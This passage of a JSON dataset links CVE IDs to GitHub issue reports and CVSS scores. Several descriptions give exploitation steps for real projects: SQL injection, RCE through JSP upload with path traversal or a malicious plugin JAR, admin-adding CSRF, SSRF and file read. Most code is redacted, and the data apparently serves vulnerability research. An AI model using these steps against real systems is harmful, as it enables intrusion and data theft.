  73584. "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/304",
  73585. "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/304",
  73586. "Repo_new": "kekingcn/kkfileview",
  73587. "Issue_Created_At": "2021-11-14T13:08:01Z",
  73588. "description": "arbitrary file read vulnerability. APITAG arbitrary file read vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has arbitrary file read vulnerability which may lead to sensitive file leak on related host\u3002 \u6f0f\u6d1e\u4f4d\u7f6evulnerable code location PATHTAG APITAG The vulnerable code is located at line NUMBERTAG in PATHTAG . The value which passed through param APITAG supports file protocol. ERRORTAG APITAG APITAG URLTAG \u53ef\u5f97 The version of official demo site is NUMBERTAG isit URLTAG and the concept is proven.",
  73589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73590. "severity": "HIGH",
  73591. "baseScore": 7.5,
  73592. "impactScore": 3.6,
  73593. "exploitabilityScore": 3.9
  73594. },
  73595. {
  73596. "CVE_ID": "CVE-2021-43735",
  73597. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/55",
  73598. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/55",
  73599. "Repo_new": "arterli/cmswing",
  73600. "Issue_Created_At": "2021-11-14T12:04:02Z",
  73601. "description": "SQLi vulnerability in Cmswing NUMBERTAG Find a SQLi vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG behavior rule APITAG FILETAG APITAG FILETAG APITAG anything, then save it.we can find sqli vulnerability. FILETAG FILETAG FILETAG",
  73602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73603. "severity": "CRITICAL",
  73604. "baseScore": 9.8,
  73605. "impactScore": 5.9,
  73606. "exploitabilityScore": 3.9
  73607. },
  73608. {
  73609. "CVE_ID": "CVE-2021-43736",
  73610. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/56",
  73611. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/56",
  73612. "Repo_new": "arterli/cmswing",
  73613. "Issue_Created_At": "2021-11-14T13:13:32Z",
  73614. "description": "RCE vulnerability in Cmswing NUMBERTAG Find a RCE vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG log rule APITAG or APITAG FILETAG APITAG FILETAG APITAG anything, then save it. We can find that our code is executed FILETAG NUMBERTAG Get IP and open calc. FILETAG FILETAG",
  73615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73616. "severity": "CRITICAL",
  73617. "baseScore": 9.8,
  73618. "impactScore": 5.9,
  73619. "exploitabilityScore": 3.9
  73620. },
  73621. {
  73622. "CVE_ID": "CVE-2021-43737",
  73623. "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
  73624. "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/28",
  73625. "Repo_new": "hiliqi/xiaohuanxiong",
  73626. "Issue_Created_At": "2021-11-14T14:00:31Z",
  73627. "description": "There are two CSRF vulnerabilities that can add the administrator account and modify administrator account's password. After the administrator logged in, open the following two pages and Click the button, you can use javascript to create a APITAG that is triggered directly poc:one >add new administrator account CODETAG poc:two >modify administrator account's password CODETAG",
  73628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  73629. "severity": "MEDIUM",
  73630. "baseScore": 6.5,
  73631. "impactScore": 3.6,
  73632. "exploitabilityScore": 2.8
  73633. },
  73634. {
  73635. "CVE_ID": "CVE-2021-43745",
  73636. "Issue_Url_old": "https://github.com/zadam/trilium/issues/2340",
  73637. "Issue_Url_new": "https://github.com/zadam/trilium/issues/2340",
  73638. "Repo_new": "zadam/trilium",
  73639. "Issue_Created_At": "2021-11-15T01:40:53Z",
  73640. "description": "Denial of Service. Preflight Checklist X] I have searched the [issue tracker URLTAG for a bug report that matches the one I want to file, without success. Trilium Version NUMBERTAG What operating system are you using? Windows What is your setup? Local (no sync) Operating System Version Windows NUMBERTAG APITAG Expected Behavior PATHTAG APITAG function NUMBERTAG lines: APITAG > APITAG Actual Behavior local software listen NUMBERTAG send URLTAG similar DDOS FILETAG Additional Information _No response_",
  73641. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73642. "severity": "MEDIUM",
  73643. "baseScore": 5.5,
  73644. "impactScore": 3.6,
  73645. "exploitabilityScore": 1.8
  73646. },
  73647. {
  73648. "CVE_ID": "CVE-2021-43775",
  73649. "Issue_Url_old": "https://github.com/aimhubio/aim/issues/999",
  73650. "Issue_Url_new": "https://github.com/aimhubio/aim/issues/999",
  73651. "Repo_new": "aimhubio/aim",
  73652. "Issue_Created_At": "2021-11-11T12:25:17Z",
  73653. "description": "Security vulnerability. What would be the right contact to report a security vulnerability? thanks!",
  73654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  73655. "severity": "HIGH",
  73656. "baseScore": 8.6,
  73657. "impactScore": 4.0,
  73658. "exploitabilityScore": 3.9
  73659. },
  73660. {
  73661. "CVE_ID": "CVE-2021-43789",
  73662. "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/26623",
  73663. "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/26623",
  73664. "Repo_new": "prestashop/prestashop",
  73665. "Issue_Created_At": "2021-11-16T09:29:09Z",
  73666. "description": "A. Prerequisites FILETAG X] I have already [searched in existing features request URLTAG and found no previous suggestion of this feature. Is your feature request related to a problem? s Describe the solution you'd like s Alternatives you've considered s Additional context s",
  73667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73668. "severity": "CRITICAL",
  73669. "baseScore": 9.8,
  73670. "impactScore": 5.9,
  73671. "exploitabilityScore": 3.9
  73672. },
  73673. {
  73674. "CVE_ID": "CVE-2021-43801",
  73675. "Issue_Url_old": "https://github.com/mercurius-js/mercurius/issues/677",
  73676. "Issue_Url_new": "https://github.com/mercurius-js/mercurius/issues/677",
  73677. "Repo_new": "mercurius-js/mercurius",
  73678. "Issue_Created_At": "2021-12-01T16:53:59Z",
  73679. "description": "Context can be undefined in the error handler. In production it's possible to see: ERRORTAG This can happen if an error is thrown in a hook. We should be adding back the check for Context in the error handler. APITAG posted by MENTIONTAG in URLTAG",
  73680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73681. "severity": "HIGH",
  73682. "baseScore": 7.5,
  73683. "impactScore": 3.6,
  73684. "exploitabilityScore": 3.9
  73685. },
  73686. {
  73687. "CVE_ID": "CVE-2021-43802",
  73688. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/5010",
  73689. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/5010",
  73690. "Repo_new": "ether/etherpad-lite",
  73691. "Issue_Created_At": "2021-04-17T10:06:14Z",
  73692. "description": "Sessionstorage is constantly growing. The session storage seems to be constantly growing When running etherpad we see a constantly growing number of session storage values in the database. Is there a way to clean them up? We already looked into the script, which didn't help. FILETAG . So it seems that these sessions are no group sessions. A standard session storage entry looks like: CODETAG Server (please complete the following information): Etherpad version NUMBERTAG OS: Debian Buster FILETAG version (node version): APITAG npm version (npm version NUMBERTAG Additional context All session storage keys values from mariadb: CODETAG None session storage keys values from mariadb: CODETAG",
  73693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73694. "severity": "HIGH",
  73695. "baseScore": 8.8,
  73696. "impactScore": 5.9,
  73697. "exploitabilityScore": 2.8
  73698. },
  73699. {
  73700. "CVE_ID": "CVE-2021-43814",
  73701. "Issue_Url_old": "https://github.com/rizinorg/rizin/issues/2083",
  73702. "Issue_Url_new": "https://github.com/rizinorg/rizin/issues/2083",
  73703. "Repo_new": "rizinorg/rizin",
  73704. "Issue_Created_At": "2021-12-09T15:44:16Z",
  73705. "description": "Heap based OOB write when parsing dwarf die info. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG amd NUMBERTAG File format of the file you reverse (mandatory) | ELF NUMBERTAG Architecture/bits of the file (mandatory) | amd NUMBERTAG APITAG full output, not truncated (mandatory) | rizin NUMBERTAG git @ linu NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Analyzing binaries shouldn't trigger an OOB memory write. Actual behavior There is a heap based out of bounds write in APITAG when reversing an amd NUMBERTAG elf binary with dwarf debug info, respectively. Steps to reproduce the behavior Analyze the binary attached below with aaa on an asan build to reproduce the crash. FILETAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG The issue seems to be that at APITAG the line APITAG gets executed with APITAG equal to NUMBERTAG so this is equivalent to a APITAG (I think in this case a chunk with the smallest allocatable size is returned, which should be around NUMBERTAG or NUMBERTAG bytes, but in APITAG a die_attribute gets written, which is NUMBERTAG bytes in size). This happens because in APITAG the loop gets run APITAG times, but as APITAG is NUMBERTAG and is of type APITAG this results in an underflow which then triggers the OOB write.",
  73706. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73707. "severity": "HIGH",
  73708. "baseScore": 7.8,
  73709. "impactScore": 5.9,
  73710. "exploitabilityScore": 1.8
  73711. },
  73712. {
  73713. "CVE_ID": "CVE-2021-43816",
  73714. "Issue_Url_old": "https://github.com/containerd/containerd/issues/6194",
  73715. "Issue_Url_new": "https://github.com/containerd/containerd/issues/6194",
  73716. "Repo_new": "containerd/containerd",
  73717. "Issue_Created_At": "2021-11-02T00:39:45Z",
  73718. "description": "cri + selinux: /etc/hosts from APITAG mount getting relabeled. Description When running rke2/k3s pointing at our bundled (or stock) containerd, one can apply an unprivileged pod that relabels APITAG on the host by mounting a APITAG APITAG volume at the same location in the container: ERRORTAG Steps to reproduce the issue NUMBERTAG Install RKE2 on APITAG NUMBERTAG with APITAG enabled (the default when installed via FILETAG NUMBERTAG Establish that your APITAG is correctly labeled: CODETAG NUMBERTAG Apply this pod spec: ERRORTAG NUMBERTAG Wait for the pod to spin up then check your APITAG : CODETAG Describe the results you received and expected Expected: APITAG retained APITAG type label with no categories Received: APITAG relabeled to APITAG with category labels specific to the container that bind mounted it What version of containerd are you using NUMBERTAG and NUMBERTAG k3s1) Any other relevant information ERRORTAG First seen while running k8s e2e conformance via sonobuoy against rke NUMBERTAG rc1+rke2r1 (most recently against NUMBERTAG rc1+rke2r1): URLTAG APITAG seen with k3s NUMBERTAG that also ships with containerd NUMBERTAG Show configuration if it is related to CRI plugin. ERRORTAG",
  73719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
  73720. "severity": "CRITICAL",
  73721. "baseScore": 9.1,
  73722. "impactScore": 6.0,
  73723. "exploitabilityScore": 2.3
  73724. },
  73725. {
  73726. "CVE_ID": "CVE-2021-43857",
  73727. "Issue_Url_old": "https://github.com/Gerapy/Gerapy/issues/219",
  73728. "Issue_Url_new": "https://github.com/gerapy/gerapy/issues/219",
  73729. "Repo_new": "gerapy/gerapy",
  73730. "Issue_Created_At": "2021-12-02T12:51:31Z",
  73731. "description": "Gerapy NUMBERTAG project_configure function exist remote code execute !!!. Hi, your project find a vulnerability source location: URLTAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: application/json, text/plain, / Authorization: Token $token Content Type: application/x www form urlencoded Content Length NUMBERTAG spider\": \" APITAG | APITAG \"} FILETAG",
  73732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73733. "severity": "HIGH",
  73734. "baseScore": 8.8,
  73735. "impactScore": 5.9,
  73736. "exploitabilityScore": 2.8
  73737. },
  73738. {
  73739. "CVE_ID": "CVE-2021-43862",
  73740. "Issue_Url_old": "https://github.com/jcubic/jquery.terminal/issues/727",
  73741. "Issue_Url_new": "https://github.com/jcubic/jquery.terminal/issues/727",
  73742. "Repo_new": "jcubic/jquery.terminal",
  73743. "Issue_Created_At": "2021-12-28T20:03:48Z",
  73744. "description": "Self XSS. Self XSS is possible by typing something like \"onclick=\"alert NUMBERTAG I think it's because data text doesn't contain sanitized characters. Don't think it's critical but there you go regardless :)",
  73745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73746. "severity": "MEDIUM",
  73747. "baseScore": 5.4,
  73748. "impactScore": 2.7,
  73749. "exploitabilityScore": 2.3
  73750. },
  73751. {
  73752. "CVE_ID": "CVE-2021-44093",
  73753. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/115",
  73754. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/115",
  73755. "Repo_new": "94fzb/zrlog",
  73756. "Issue_Created_At": "2021-11-16T07:45:28Z",
  73757. "description": "APITAG NUMBERTAG Remote command execution vulnerability. there is a remote command execution vulnerability at the upload avatar function on the background. APITAG upload pictures, then intercept data package, like this FILETAG then modify the file name to jsp , you can bypass the limit that cannot be uploaded by JSP files. FILETAG although JSP files have been uploaded, because of the existence of global interceptors, we cannot execute commands. it would return NUMBERTAG APITAG however, through my research, I found that the upload directory can be traversed. just modify the parameter dir , like this FILETAG then the file will be saved to the corresponding directory. APITAG access this file, successfully execute system command APITAG Code analysis. at APITAG APITAG APITAG CODETAG APITAG",
  73758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73759. "severity": "CRITICAL",
  73760. "baseScore": 9.8,
  73761. "impactScore": 5.9,
  73762. "exploitabilityScore": 3.9
  73763. },
  73764. {
  73765. "CVE_ID": "CVE-2021-44094",
  73766. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/116",
  73767. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/116",
  73768. "Repo_new": "94fzb/zrlog",
  73769. "Issue_Created_At": "2021-11-16T11:45:07Z",
  73770. "description": "APITAG NUMBERTAG has a remote command execution vulnerability at plugin download function. Just download a plugin and intercept your data package. APITAG data package like this APITAG modify the JAR just downloaded, join the malicious code in the startup class. APITAG then modify the parameter host to the malicious JAR file download address APITAG after download, malicious code will be executed APITAG Download Record APITAG",
  73771. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73772. "severity": "HIGH",
  73773. "baseScore": 7.8,
  73774. "impactScore": 5.9,
  73775. "exploitabilityScore": 1.8
  73776. },
  73777. {
  73778. "CVE_ID": "CVE-2021-44095",
  73779. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
  73780. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/1",
  73781. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73782. "Issue_Created_At": "2021-09-27T17:15:07Z",
  73783. "description": "Vulnerability/BUG SQL Injection on login page.. Hi I found a SQL injection vulnerability in your hospital management system. Login page request APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as shown in the image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certain characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73784. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73785. "severity": "CRITICAL",
  73786. "baseScore": 9.8,
  73787. "impactScore": 5.9,
  73788. "exploitabilityScore": 3.9
  73789. },
  73790. {
  73791. "CVE_ID": "CVE-2021-44096",
  73792. "Issue_Url_old": "https://github.com/EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel/issues/2",
  73793. "Issue_Url_new": "https://github.com/egavilan-media/user-registration-and-login-system-with-admin-panel/issues/2",
  73794. "Repo_new": "egavilan-media/user-registration-and-login-system-with-admin-panel",
  73795. "Issue_Created_At": "2021-09-28T18:02:52Z",
  73796. "description": "Vulnerability/BUG SQL Injection on \"profile_action update_user\". Hi I found a SQL injection vulnerability User Registration and Login System With Admin Panel APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as shown in the image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certain characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73797. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73798. "severity": "CRITICAL",
  73799. "baseScore": 9.8,
  73800. "impactScore": 5.9,
  73801. "exploitabilityScore": 3.9
  73802. },
  73803. {
  73804. "CVE_ID": "CVE-2021-44097",
  73805. "Issue_Url_old": "https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management/issues/1",
  73806. "Issue_Url_new": "https://github.com/egavilan-media/contact-form-with-messages-entry-management/issues/1",
  73807. "Repo_new": "egavilan-media/contact-form-with-messages-entry-management",
  73808. "Issue_Created_At": "2021-09-30T08:45:03Z",
  73809. "description": "Vulnerability/BUG SQL Injection while APITAG Hi I found a SQL injection vulnerability in your Contact Form With Messages Entry Management APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as shown in the image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certain characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73811. "severity": "CRITICAL",
  73812. "baseScore": 9.8,
  73813. "impactScore": 5.9,
  73814. "exploitabilityScore": 3.9
  73815. },
  73816. {
  73817. "CVE_ID": "CVE-2021-44098",
  73818. "Issue_Url_old": "https://github.com/EGavilan-Media/Expense-Management-System/issues/1",
  73819. "Issue_Url_new": "https://github.com/egavilan-media/expense-management-system/issues/1",
  73820. "Repo_new": "egavilan-media/expense-management-system",
  73821. "Issue_Created_At": "2021-09-30T09:22:03Z",
  73822. "description": "Vulnerability/BUG SQL Injection while updating details.. Hi I found a SQL injection vulnerability in your Expense Management System APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Above query will only sleep database for NUMBERTAG second but Using APITAG bad user can dump the database as shown in the image. FILETAG Control User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certain characters and keywords are sanitized is not recommended. Remediation To prevent this follow the following steps: a) Validate all input data against a whitelist b) Use of parameterized queries String APITAG = \"SELECT FROM User WHERE APITAG = ? \"; APITAG APITAG = APITAG APITAG APITAG APITAG rs = APITAG",
  73823. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73824. "severity": "CRITICAL",
  73825. "baseScore": 9.8,
  73826. "impactScore": 5.9,
  73827. "exploitabilityScore": 3.9
  73828. },
  73829. {
  73830. "CVE_ID": "CVE-2021-44108",
  73831. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1247",
  73832. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1247",
  73833. "Repo_new": "open5gs/open5gs",
  73834. "Issue_Created_At": "2021-11-16T13:10:08Z",
  73835. "description": "memory corruption and null pointer dereference. Thanks for the great project first. I have found some vulnerabilities during reading the source code. memory corruption in APITAG when nf receive sbi(http2) message with APITAG , APITAG in APITAG will try to parse all parts in the request, but the struct APITAG only have APITAG which is NUMBERTAG member, and this will cause a memory corruption to stack memory. below is a poc requests to crash the amfd(which listen on APITAG ERRORTAG null pointer dereference APITAG in amf will call APITAG in APITAG APITAG can parse a data without n2_info_container and return APITAG as null. This will skip the if on line NUMBERTAG ERRORTAG this case will not set APITAG , but on line NUMBERTAG APITAG is being dereferenced APITAG below is a poc crash amfd(this requires a live ue context, i was using ueransim to simulate a imsi NUMBERTAG here): CODETAG leommxj from Chaitin Security Research Lab.",
  73836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73837. "severity": "HIGH",
  73838. "baseScore": 7.5,
  73839. "impactScore": 3.6,
  73840. "exploitabilityScore": 3.9
  73841. },
  73842. {
  73843. "CVE_ID": "CVE-2021-44111",
  73844. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/102",
  73845. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/102",
  73846. "Repo_new": "s-cart/s-cart",
  73847. "Issue_Created_At": "2021-11-17T08:46:35Z",
  73848. "description": "A bug that leads to Arbitrary file download. Describe the bug cod in PATHTAG CODETAG without any filter,can Splicing the path. poc: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG login in as admin NUMBERTAG isit the PATHTAG NUMBERTAG the file will be downloaded Screenshots FILETAG version newest NUMBERTAG",
  73849. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  73850. "severity": "MEDIUM",
  73851. "baseScore": 4.4,
  73852. "impactScore": 3.6,
  73853. "exploitabilityScore": 0.8
  73854. },
  73855. {
  73856. "CVE_ID": "CVE-2021-44138",
  73857. "Issue_Url_old": "https://github.com/maybe-why-not/reponame/issues/2",
  73858. "Issue_Url_new": "https://github.com/maybe-why-not/reponame/issues/2",
  73859. "Repo_new": "maybe-why-not/reponame",
  73860. "Issue_Created_At": "2022-04-04T11:09:53Z",
  73861. "description": "Directory traversal vulnerability in Caucho Resin. Directory traversal vulnerability in Caucho Resin, as distributed in Resin NUMBERTAG APITAG allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. FILETAG",
  73862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73863. "severity": "HIGH",
  73864. "baseScore": 7.5,
  73865. "impactScore": 3.6,
  73866. "exploitabilityScore": 3.9
  73867. },
  73868. {
  73869. "CVE_ID": "CVE-2021-44139",
  73870. "Issue_Url_old": "https://github.com/alibaba/Sentinel/issues/2451",
  73871. "Issue_Url_new": "https://github.com/alibaba/sentinel/issues/2451",
  73872. "Repo_new": "alibaba/sentinel",
  73873. "Issue_Created_At": "2021-11-18T05:38:15Z",
  73874. "description": "Report a Sentinel Security Vulnerability about SSRF. \u4f60\u597d\uff0c\u6211\u662fthreedr3am of APITAG Security APITAG APITAG Issue Description Type: bug report \u7531\u4e8e\u8be5\u5f00\u6e90\u9879\u76ee\u7684sentinel dashboard PATHTAG APITAG APITAG APITAG APITAG dashboard\u53d1\u8d77\u4efb\u610fGET\u8bf7\u6c42\u3002 ERRORTAG NUMBERTAG APITAG ERRORTAG Describe what happened (or what feature you want) APITAG GET\u8bf7\u6c42\u7684SSRF\u653b\u51fb\u3002 APITAG Describe what you expected to happen SSRF How to reproduce it (as minimally and precisely as possible NUMBERTAG github\u62c9\u53d6\u5f00\u6e90\u4ee3\u7801 URLTAG NUMBERTAG PATHTAG NUMBERTAG nc lvvp NUMBERTAG localhost NUMBERTAG SSRF GET\u653b\u51fb\uff0ccurl XGET ' URLTAG \u53ef\u4ee5\u770b\u5230\uff0cnc\u76d1\u542c\u5230\u4e86GET\u8bf7\u6c42 CODETAG Tell us your environment Anything else we need to know?",
  73875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73876. "severity": "HIGH",
  73877. "baseScore": 7.5,
  73878. "impactScore": 3.6,
  73879. "exploitabilityScore": 3.9
  73880. },
  73881. {
  73882. "CVE_ID": "CVE-2021-44144",
  73883. "Issue_Url_old": "https://github.com/CroatiaControlLtd/asterix/issues/183",
  73884. "Issue_Url_new": "https://github.com/croatiacontrolltd/asterix/issues/183",
  73885. "Repo_new": "croatiacontrolltd/asterix",
  73886. "Issue_Created_At": "2021-05-21T21:15:06Z",
  73887. "description": "\ud83d\udea8 Potential Heap based Buffer Overflow. \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential medium severity Heap based Buffer Overflow vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  73888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  73889. "severity": "CRITICAL",
  73890. "baseScore": 9.1,
  73891. "impactScore": 5.2,
  73892. "exploitabilityScore": 3.9
  73893. },
  73894. {
  73895. "CVE_ID": "CVE-2021-44150",
  73896. "Issue_Url_old": "https://github.com/tusdotnet/tusdotnet/issues/157",
  73897. "Issue_Url_new": "https://github.com/tusdotnet/tusdotnet/issues/157",
  73898. "Repo_new": "tusdotnet/tusdotnet",
  73899. "Issue_Created_At": "2021-11-22T11:42:09Z",
  73900. "description": "Tus client uses a deprecated cryptographic function to calculate the file checksums. SHA NUMBERTAG is not collision resistant, which makes it easier for context dependent attackers to conduct tampering attacks and alter the checksum which makes it possible to alter the file being uploaded itself. For a long time, it has been possible \"to find collisions for SHA1 and that thus it is not secure to use for digital signatures, file integrity, and file identification purposes\". see: URLTAG Also: URLTAG CVETAG Finding: FILETAG URLTAG URLTAG URLTAG FILETAG URLTAG",
  73901. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  73902. "severity": "HIGH",
  73903. "baseScore": 7.5,
  73904. "impactScore": 3.6,
  73905. "exploitabilityScore": 3.9
  73906. },
  73907. {
  73908. "CVE_ID": "CVE-2021-44219",
  73909. "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
  73910. "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/813",
  73911. "Repo_new": "flipped-aurora/gin-vue-admin",
  73912. "Issue_Created_At": "2021-11-23T08:05:36Z",
  73913. "description": "APITAG Security Issues. gin vue admin NUMBERTAG Node \u7248\u672c APITAG Golang \u7248\u672c go NUMBERTAG bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u5df2\u7ecf\u901a\u8fc7\u90ae\u7bb1\u8054\u7cfb\u4f60\u3002 \u4fee\u6539\u5efa\u8bae \u5f88\u597d\u4fee\u590d",
  73914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73915. "severity": "CRITICAL",
  73916. "baseScore": 9.8,
  73917. "impactScore": 5.9,
  73918. "exploitabilityScore": 3.9
  73919. },
  73920. {
  73921. "CVE_ID": "CVE-2021-44238",
  73922. "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/2",
  73923. "Issue_Url_new": "https://github.com/loadream/ayacms/issues/2",
  73924. "Repo_new": "loadream/ayacms",
  73925. "Issue_Created_At": "2021-11-22T03:02:39Z",
  73926. "description": "APITAG NUMBERTAG has RCE vulnerability. vulnerability in PATHTAG Through code audit, it is found that the value of $code comes from the transfer parameters of form data. FILETAG Then through file_put ($file, $code) writes the passed parameters to the file. FILETAG The whole process does not filter the passed parameter $code, resulting in code execution. Reappearance NUMBERTAG login the admin and click the edit button FILETAG APITAG your malicious code FILETAG APITAG edited file is saved in PATHTAG access it. result FILETAG :",
  73927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  73928. "severity": "HIGH",
  73929. "baseScore": 7.2,
  73930. "impactScore": 5.9,
  73931. "exploitabilityScore": 1.2
  73932. },
  73933. {
  73934. "CVE_ID": "CVE-2021-44255",
  73935. "Issue_Url_old": "https://github.com/ccrisan/motioneyeos/issues/2843",
  73936. "Issue_Url_new": "https://github.com/motioneye-project/motioneyeos/issues/2843",
  73937. "Repo_new": "motioneye-project/motioneyeos",
  73938. "Issue_Created_At": "2021-11-21T15:35:01Z",
